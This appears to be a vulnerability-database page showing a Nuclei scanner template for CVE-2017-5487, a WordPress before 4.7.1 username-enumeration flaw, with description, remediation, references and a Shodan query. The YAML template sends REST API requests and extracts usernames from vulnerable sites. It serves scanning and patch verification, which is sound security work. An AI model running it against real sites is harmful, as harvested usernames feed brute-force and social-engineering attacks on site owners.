Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-5487
HistoryJun 10, 2021 - 12:00 a.m.

WordPress Core <4.7.1 - Username Enumeration

2021-06-1000:00:00
ProjectDiscovery
github.com
104
cve
wordpress
enumeration
exploit-db

AI Score

5.1

Confidence

High

EPSS

0.874

Percentile

98.7%

WordPress Core before 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows a remote attacker to obtain sensitive information via a wp-json/wp/v2/users request.

id: CVE-2017-5487

info:
  name: WordPress Core <4.7.1 - Username Enumeration
  author: Manas_Harsh,daffainfo,geeknik,dr0pd34d
  severity: medium
  description: WordPress Core before 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows a remote attacker to obtain sensitive information via a wp-json/wp/v2/users request.
  impact: |
    An attacker can easily determine valid usernames, which can lead to targeted attacks such as brute force attacks or social engineering.
  remediation: |
    Update WordPress to version 4.7.1 or later
  reference:
    - https://www.exploit-db.com/exploits/41497
    - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/
    - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
    - http://www.openwall.com/lists/oss-security/2017/01/14/6
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2017-5487
    cwe-id: CWE-200
    epss-score: 0.97179
    epss-percentile: 0.99767
    cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wordpress
    product: wordpress
    shodan-query: http.component:"WordPress"
  tags: cve,cve2017,wordpress,wp,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/users/"
      - "{{BaseURL}}/?rest_route=/wp/v2/users/"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"id":'
          - '"name":'
          - '"avatar_urls":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: json
        name: "usernames"
        json:
          - '.[] | .slug'
          - '.[].name'
        part: body
# digest: 4a0a00473045022012362c3e5d6328b56620ca5ba033d652c01140ab49135a379f1fc623d1dabc80022100b3f06e821337ae0f1da2edea5c31e37a8c383e1c92dbec597ea16233f6d6491e:922c64590222798bb761d5b6d8e72950